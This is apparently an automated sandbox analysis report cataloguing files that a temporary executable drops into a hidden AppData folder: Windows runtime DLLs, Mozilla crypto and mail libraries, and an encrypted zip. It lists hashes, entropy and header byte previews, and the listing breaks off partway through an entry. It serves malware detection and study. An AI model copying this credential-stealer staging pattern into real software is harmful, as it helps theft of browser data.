Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	19256
Entropy (8bit):	7.060393359865728
Encrypted:	false
MD5:	93D3DA06BF894F4FA21007BEE06B5E7D
SHA1:	1E47230A7EBCFAF643087A1929A385E0D554AD15
SHA-256:	F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
SHA-512:	72BD6D46A464DE74A8DAC4C346C52D068116910587B1C7B97978DF888925216958CE77BE1AE049C3DCCF5BF3FFFB21BC41A0AC329622BC9BBC190DF63ABB25C6
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...J.o ...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................J.o ........7...d...d.......J.o ........d...............J.o ....................RSDSq.........pkQX[....api-ms-win-crt-heap-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........J.o ....6...............(...........c...................S.......................1...V...y.......................<...c...........................U...z...............:...u...................&...E...p.......................,...U...

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-locale-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	18744
Entropy (8bit):	7.13172731865352
Encrypted:	false
MD5:	A2F2258C32E3BA9ABF9E9E38EF7DA8C9
SHA1:	116846CA871114B7C54148AB2D968F364DA6142F
SHA-256:	565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
SHA-512:	E98CBC8D958E604EFFA614A3964B3D66B6FC646BDCA9AA679EA5E4EB92EC0497B91485A40742F3471F4FF10DE83122331699EDC56A50F06AE86F21FAD70953FE
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...\|..O...........!......................... ...............................0......E*....@.............................e............ ..................8=..............T............................................................................text...u........................... ..`.rsrc........ ......................@..@v...................\|..O........9...d...d.......\|..O........d...............\|..O....................RSDS.X...7.......$k....api-ms-win-crt-locale-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg.......e....edata... ..`....rsrc$01....` .......rsrc$02....................\|..O....................8...........5...h...............E...................$...N...t...................$...D...b...!...R............... ...s...................:...k.......................9...X...................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-math-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	28984
Entropy (8bit):	6.6686462438397
Encrypted:	false
MD5:	8B0BA750E7B15300482CE6C961A932F0
SHA1:	71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19
SHA-256:	BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
SHA-512:	FB646CDCDB462A347ED843312418F037F3212B2481F3897A16C22446824149EE96EB4A4B47A903CA27B1F4D7A352605D4930DF73092C380E3D4D77CE4E972C5A
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................@...............................P............@..............................+...........@...............4..8=..............T............................................................................text....,.......................... ..`.rsrc........@.......0..............@..@v...............................7...d...d...................d.......................................RSDSB...=........,....api-ms-win-crt-math-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg........+...edata...@..`....rsrc$01....`@.......rsrc$02................l.......:...:...(...................................(...@...X...q...............................4...M...g........................ ..= ..i ... ... ... ...!..E!..o!...!...!...!..."..F"..s"..."..."..."...#..E#..o#...#...#..

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-multibyte-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	26424
Entropy (8bit):	6.712286643697659
Encrypted:	false
MD5:	35FC66BD813D0F126883E695664E7B83
SHA1:	2FD63C18CC5DC4DEFC7EA82F421050E668F68548
SHA-256:	66ABF3A1147751C95689F5BC6A259E55281EC3D06D3332DD0BA464EFFA716735
SHA-512:	65F8397DE5C48D3DF8AD79BAF46C1D3A0761F727E918AE63612EA37D96ADF16CC76D70D454A599F37F9BA9B4E2E38EBC845DF4C74FC1E1131720FD0DCB881431
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u'............!.....$...................@...............................P............@.............................. ...........@...............*..8=..............T............................................................................text....".......$.................. ..`.rsrc........@.......&..............@..@v....................u'.........<...d...d........u'.........d................u'.....................RSDS7.%..5..+...+.....api-ms-win-crt-multibyte-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg........ ...edata...@..`....rsrc$01....`@.......rsrc$02.....................u'.....................8...X...x...;...`.......................1...T...w...................'...L...q.......................B...e.......................7...Z...}...................+...L...m.......................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-private-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	73016
Entropy (8bit):	5.838702055399663
Encrypted:	false
MD5:	9910A1BFDC41C5B39F6AF37F0A22AACD
SHA1:	47FA76778556F34A5E7910C816C78835109E4050
SHA-256:	65DED8D2CE159B2F5569F55B2CAF0E2C90F3694BD88C89DE790A15A49D8386B9
SHA-512:	A9788D0F8B3F61235EF4740724B4A0D8C0D3CF51F851C367CC9779AB07F208864A7F1B4A44255E0DE8E030D84B63B1BDB58F12C8C20455FF6A55EF6207B31A91
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....^1...........!................................................................R.....@.............................................................8=..............T............................................................................text............................... ..`.rsrc...............................@..@v.....................^1........:...d...d.........^1........d.................^1....................RSDS.J..w/.8..bu..3.....api-ms-win-crt-private-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata......`....rsrc$01....`........rsrc$02......................^1.....>..............8...h#...5...>...?..7?.._?...?...?...?...@..V@...@...@...@..+A..\A...A...A...A...B..LB...B...B...C..HC...C...C...C...C...D..HD...D...D...E..eE...E...E...F..1F..gF...F...F...G..BG..uG...G..

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-process-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	19256
Entropy (8bit):	7.076072254895036
Encrypted:	false
MD5:	8D02DD4C29BD490E672D271700511371
SHA1:	F3035A756E2E963764912C6B432E74615AE07011
SHA-256:	C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
SHA-512:	D44EF51D3AAF42681659FFFFF4DD1A1957EAF4B8AB7BB798704102555DA127B9D7228580DCED4E0FC98C5F4026B1BAB242808E72A76E09726B0AF839E384C3B0
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...l.h............!......................... ...............................0.......U....@.............................x............ ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................l.h.........:...d...d.......l.h.........d...............l.h.....................RSDSZ\.qM..I....3.....api-ms-win-crt-process-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......x....edata... ..`....rsrc$01....` .......rsrc$02....................l.h.............$...$...8.......X...................&...@...Y...q...........................*...E..._...z.......................!...<...V...q...........................9...V...t.......................7...R...i...

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-runtime-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	22840
Entropy (8bit):	6.942029615075195
Encrypted:	false
MD5:	41A348F9BEDC8681FB30FA78E45EDB24
SHA1:	66E76C0574A549F293323DD6F863A8A5B54F3F9B
SHA-256:	C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
SHA-512:	8C2CB53CCF9719DE87EE65ED2E1947E266EC7E8343246DEF6429C6DF0DC514079F5171ACD1AA637276256C607F1063144494B992D4635B01E09DDEA6F5EEF204
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....L............!.........................0...............................@.......i....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v.....................L.........:...d...d.........L.........d.................L.....................RSDS6..>[d.=. ....C....api-ms-win-crt-runtime-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02......................L.....f.......k...k...8...............................4...S...s.......................E...g.......................)...N...n...................&...E...f...................'...D...j.......................>.......

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-stdio-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	24368
Entropy (8bit):	6.873960147000383
Encrypted:	false
MD5:	FEFB98394CB9EF4368DA798DEAB00E21
SHA1:	316D86926B558C9F3F6133739C1A8477B9E60740
SHA-256:	B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
SHA-512:	57476FE9B546E4CAFB1EF4FD1CBD757385BA2D445D1785987AFB46298ACBE4B05266A0C4325868BC4245C2F41E7E2553585BFB5C70910E687F57DAC6A8E911E8
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................0...............................@.......)....@.............................a............0..............."..0=..............T............................................................................text...a........................... ..`.rsrc........0......................@..@v...............................8...d...d...................d.......................................RSDS...iS#.hg.....j....api-ms-win-crt-stdio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg.......a....edata...0..`....rsrc$01....`0.......rsrc$02................^...............(....... ...................<...y...........)...h........... ...]...............H...............)...D...^...v...............................T...u.......................9...Z...{...................0...Q...

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-string-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	23488
Entropy (8bit):	6.840671293766487
Encrypted:	false
MD5:	404604CD100A1E60DFDAF6ECF5BA14C0
SHA1:	58469835AB4B916927B3CABF54AEE4F380FF6748
SHA-256:	73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
SHA-512:	DA024CCB50D4A2A5355B7712BA896DF850CEE57AA4ADA33AAD0BAE6960BCD1E5E3CEE9488371AB6E19A2073508FBB3F0B257382713A31BC0947A4BF1F7A20BE4
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......S...........!.........................0...............................@......B.....@..........................................0..............."...9..............T............................................................................text............................... ..`.rsrc........0......................@..@v......................S........9...d...d..........S........d..................S....................RSDSI.......$[~f..5....api-ms-win-crt-string-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................S....,...............8...........W...s.......................#...B...a...........................<...[...z.......................;...[...{................... ...A...b...........................<...X...r.......

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-time-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	20792
Entropy (8bit):	7.018061005886957
Encrypted:	false
MD5:	849F2C3EBF1FCBA33D16153692D5810F
SHA1:	1F8EDA52D31512EBFDD546BE60990B95C8E28BFB
SHA-256:	69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
SHA-512:	44DC4200A653363C9A1CB2BDD3DA5F371F7D1FB644D1CE2FF5FE57D939B35130AC8AE27A3F07B82B3428233F07F974628027B0E6B6F70F7B2A8D259BE95222F5
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....OI...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v....................OI........7...d...d........OI........d................OI....................RSDS...s..,E.w.9I..D....api-ms-win-crt-time-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.........OI............H...H...(...H...h... ...=...\...z.......................8...V...s.......................&...D...a...~.......................?...b.......................!...F...k.......................0...N...k...................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-utility-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	18744
Entropy (8bit):	7.127951145819804
Encrypted:	false
MD5:	B52A0CA52C9C207874639B62B6082242
SHA1:	6FB845D6A82102FF74BD35F42A2844D8C450413B
SHA-256:	A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
SHA-512:	18834D89376D703BD461EDF7738EB723AD8D54CB92ACC9B6F10CBB55D63DB22C2A0F2F3067FE2CC6FEB775DB397030606608FF791A46BF048016A1333028D0A4
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....!5............!......................... ...............................0.......4....@.............................^............ ..................8=..............T............................................................................text...n........................... ..`.rsrc........ ......................@..@v....................!5.........:...d...d........!5.........d................!5.....................RSDS............k.....api-ms-win-crt-utility-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......^....edata... ..`....rsrc$01....` .......rsrc$02.....................!5.....d...............8.......(...................#...<...U...l...............................+...@...[...r...................................4...I..._.......................3...N...e...\|.......................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\breakpadinjector.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes):	117712
Entropy (8bit):	6.598338256653691
Encrypted:	false
MD5:	A436472B0A7B2EB2C4F53FDF512D0CF8
SHA1:	963FE8AE9EC8819EF2A674DBF7C6A92DBB6B46A9
SHA-256:	87ED943D2F06D9CA8824789405B412E770FE84454950EC7E96105F756D858E52
SHA-512:	89918673ADDC0501746F24EC9A609AC4D416A4316B27BF225974E898891699B630BB18DB32432DA2F058DC11D9AF7BAF95D067B29FB39052EE7C6F622718271B
Malicious:	false
Yara Hits:	Rule: ConventionEngine_Keyword_Inject, Description: Searching for PE files with PDB path keywords, terms or anomalies., Source: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\breakpadinjector.dll, Author: @stvemillertime
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s..y7.{7.{7.{..x+>.{..~+I.{...+%.{.x+$.{..+'.{.~+..{..z+4.{7.zA.{..~+>.{..{+6.{...6.{..y+6.{Rich7.{........PE..L....@.\.........."!................t........0.......................................S....@.........................P...P.......(...................................`...T...............................@............0..D............................text............................... ..`.rdata...l...0...n... ..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes):	334288
Entropy (8bit):	6.808908775107082
Encrypted:	false
MD5:	60ACD24430204AD2DC7F148B8CFE9BDC
SHA1:	989F377B9117D7CB21CBE92A4117F88F9C7693D9
SHA-256:	9876C53134DBBEC4DCCA67581F53638EBA3FEA3A15491AA3CF2526B71032DA97
SHA-512:	626C36E9567F57FA8EC9C36D96CBADEDE9C6F6734A7305ECFB9F798952BBACDFA33A1B6C4999BA5B78897DC2EC6F91870F7EC25B2CEACBAEE4BE942FE881DB01
Malicious:	false
Reputation:	low
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....@.\.........."!.........f...............................................p............@.........................p...P............@..x....................P......0...T...............................@...............8............................text...d........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\hv8745939v498h.zip Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	Zip archive data, at least v2.0 to extract
Size (bytes):	2828315
Entropy (8bit):	7.998625956067725
Encrypted:	true
MD5:	1117CD347D09C43C1F2079439056ADA3
SHA1:	93C2CE5FC4924314318554E131CFBCD119F01AB6
SHA-256:	4CFADA7EB51A6C0CB26283F9C86784B2B2587C59C46A5D3DC0F06CAD2C55EE97
SHA-512:	FC3F85B50176C0F96898B7D744370E2FF0AA2024203B936EB1465304C1C7A56E1AC078F3FDF751F4384536602F997E745BFFF97F1D8FF2288526883185C08FAF
Malicious:	false
Reputation:	low
Preview:	PK.........znN<..{r....i......nssdbm3.dll...\|...8...N..Y..6.$J.....$1...D .a.....jL.V..C...N.;....}./............$...Z,T.R.qc...Ec.=................;..{..s....p.`..A.?M.....W!.....a..?N...~e.A..W.o.....[.}...,...;.+\....Jw.\|...k.......<yR.^.E.o.nxs.c...=V....,..F....cu.....w.O..[..u.{..<.w....7P...{..K~..E..w...c...z^..[Z....6.G.V.2..+.n4......1M.......w{f..nJL..{. d......M..+.. ......./.)..$X!......L..K.`.M...w.I..LA8r.IX...r...87..}........<.].r.....TWm......b6/._....a..W.lB...3.n.._...j....o.Mz.._Q........8....K............gr..L..H...v....6[...4I...{.1g..<..>M..$G.&Y........-.....O..9\...,t..W.m.X ..Y.3....S<#}.".>.0RBg,...lh.s..o.....r.p8...)..3..K.v....ds.n3.+]....+....krMu._.Y\..../8T......&.BC.".u..;..e.k u$......~`.{.!.M...\W.Y.37+nQ.Z.*...3\G..5d....Z.hVL..Z.\|k.5...XF.Y..lVVW..C..\|.....b..\.Z...m. ..0...P.F8{].U.p..RW,n...MM.....s..._@..>Q.. ...N.>.T?WM....)9B.............mVW.......b.6{..\|!......O....M....>.>.$\.%..L.zF.l...3

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\ldap60.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes):	132048
Entropy (8bit):	6.627391684128337
Encrypted:	false
MD5:	5A49EBF1DA3D5971B62A4FD295A71ECF
SHA1:	40917474EF7914126D62BA7CDBF6CF54D227AA20
SHA-256:	2B128B3702F8509F35CAD0D657C9A00F0487B93D70336DF229F8588FBA6BA926
SHA-512:	A6123BA3BCF9DE6AA8CE09F2F84D6D3C79B0586F9E2FD0C8A6C3246A91098099B64EDC2F5D7E7007D24048F10AE9FC30CCF7779171F3FD03919807EE6AF76809
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q...?S..?S..?S..S..?S\|.>R..?S;..S..?S\|.<R..?S\|.:R..?S\|.;R..?S..>R..?S..>S..?Sn.;R.?Sn.?R..?Sn..S..?Sn.=R..?SRich..?S........................PE..L....@.\.........."!.........f...... ........................................0............@.............................................x.................... ......p...T..............................@...............\............................text...:........................... ..`.rdata...@.......B..................@..@.data...l...........................@....rsrc...x...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\ldif60.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes):	20432
Entropy (8bit):	6.337521751154348
Encrypted:	false
MD5:	4FE544DFC7CDAA026DA6EDA09CAD66C4
SHA1:	85D21E5F5F72A4808F02F4EA14AA65154E52CE99
SHA-256:	3AABBE0AA86CE8A91E5C49B7DE577AF73B9889D7F03AF919F17F3F315A879B0F
SHA-512:	5C78C5482E589AF7D609318A6705824FD504136AEAAC63F373E913DA85FA03AF868669534496217B05D74364A165D7E08899437FCC0E3017F02D94858BA814BB
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........9..j..j..j...j..j^..k..j^..k..j^..k..j^..k..j...k..j..j..jL..k..jL..k..jL.bj..jL..k..jRich..j........................PE..L....<.\.........."!................Y........0...............................p......r.....@..........................5.......6.......P..x............2.......`..x....0..T...........................(1..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc...x....P.......,..............@..@.reloc..x....`.......0..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\lgpllibs.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes):	55760
Entropy (8bit):	6.738700405402967
Encrypted:	false
MD5:	56E982D4C380C9CD24852564A8C02C3E
SHA1:	F9031327208176059CD03F53C8C5934C1050897F
SHA-256:	7F93B70257D966EA1C1A6038892B19E8360AADD8E8AE58E75EBB0697B9EA8786
SHA-512:	92ADC4C905A800F8AB5C972B166099382F930435694D5F9A45D1FDE3FEF94FAC57FD8FAFF56FFCFCFDBC61A43E6395561B882966BE0C814ECC7E672C67E6765A
Malicious:	false
Reputation:	low
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...........l...l...l.......l..~....l..9...l..~....l..~....l..~....l.......l..l....l...l...l...l...l..l....l..l....l..l....l..l..l..l....l..Rich.l..........................PE..L...z@.\.........."!.........2......................................................t.....@...........................................x...............................T...............................@............................................text.............................. ..`.rdata..>...........................@..@.data...............................@....rodata.8...........................@..@.rsrc...x...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\libEGL.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes):	22480
Entropy (8bit):	6.528357540966124
Encrypted:	false
MD5:	96B879B611B2BBEE85DF18884039C2B8
SHA1:	00794796ACAC3899C1FB9ABBF123FEF3CC641624
SHA-256:	7B9FC6BE34F43D39471C2ADD872D5B4350853DB11CC66A323EF9E0C231542FB9
SHA-512:	DF8F1AA0384A5682AE47F212F3153D26EAFBBF12A8C996428C3366BEBE16850D0BDA453EC5F4806E6A62C36D312D37B8BBAFF549968909415670C9C61A6EC49A
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...N{.N{.N{.6..N{.F,z.N{.F,x.N{.F,~.N{.F,..N{..z.N{.T-z.N{.Nz..N{.T-~.N{.T-{.N{.T-..N{.T-y.N{.Rich.N{.........................PE..L...aA.\.........."!.........(............... ...............................p......~.....@..........................%..........d....P..x............:.......`.......!..T............................"..@............ ...............................text... ........................... ..`.rdata....... ......................@..@.data........@.......2..............@....rsrc...x....P.......4..............@..@.reloc.......`.......8..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\mozMapi32.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes):	83408
Entropy (8bit):	6.436278889454398
Encrypted:	false
MD5:	385A92719CC3A215007B83947922B9B5
SHA1:	38DE6CA70CEE1BAD84BED29CE7620A15E6ABCD10
SHA-256:	06EF2010B738FBE99BCDEBBF162473A4EE090678BB6862EEB0D4C7A8C3F225BB
SHA-512:	9F0DFF00C7E72D7017AECE3FA5C31A9C2C2AA0CCC6606D2561CE8D36A4A1F0AB8DC452E2C65E9F4B6CD32BBB8ADA1FF7C865126A5F318719579DB763E4C4183F
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........mR;...;...;.......2.......G.......).......*.......".......4.......>...;...n.......:.......:.......:.......:...Rich;...........................PE..L....=.\.........."!.........................................................`......>.....@.............................l.......<....@..P............(.......P..d...0...T...............................@............................................text............................... ..`.rdata..Z[.......\..................@..@.data........ ......................@....rsrc...P....@......................@..@.reloc..d....P......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\mozMapi32_InUse.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes):	83408
Entropy (8bit):	6.436278889454398
Encrypted:	false
MD5:	385A92719CC3A215007B83947922B9B5
SHA1:	38DE6CA70CEE1BAD84BED29CE7620A15E6ABCD10
SHA-256:	06EF2010B738FBE99BCDEBBF162473A4EE090678BB6862EEB0D4C7A8C3F225BB
SHA-512:	9F0DFF00C7E72D7017AECE3FA5C31A9C2C2AA0CCC6606D2561CE8D36A4A1F0AB8DC452E2C65E9F4B6CD32BBB8ADA1FF7C865126A5F318719579DB763E4C4183F
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........mR;...;...;.......2.......G.......).......*.......".......4.......>...;...n.......:.......:.......:.......:...Rich;...........................PE..L....=.\.........."!.........................................................`......>.....@.............................l.......<....@..P............(.......P..d...0...T...............................@............................................text............................... ..`.rdata..Z[.......\..................@..@.data........ ......................@....rsrc...P....@......................@..@.reloc..d....P......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes):	137168
Entropy (8bit):	6.784614237836286
Encrypted:	false
MD5:	EAE9273F8CDCF9321C6C37C244773139
SHA1:	8378E2A2F3635574C106EEA8419B5EB00B8489B0
SHA-256:	A0C6630D4012AE0311FF40F4F06911BCF1A23F7A4762CE219B8DFFA012D188CC
SHA-512:	06E43E484A89CEA9BA9B9519828D38E7C64B040F44CDAEB321CBDA574E7551B11FEA139CE3538F387A0A39A3D8C4CBA7F4CF03E4A3C98DB85F8121C2212A9097
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...{>.\.........."!.....z...................................................@......j.....@A........................@...t.......,.... ..x....................0..l.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..l....0......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	440120
Entropy (8bit):	6.652844702578311
Encrypted:	false
MD5:	109F0F02FD37C84BFC7508D4227D7ED5
SHA1:	EF7420141BB15AC334D3964082361A460BFDB975
SHA-256:	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
SHA-512:	46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes):	1245136
Entropy (8bit):	6.766715162066988
Encrypted:	false
MD5:	02CC7B8EE30056D5912DE54F1BDFC219
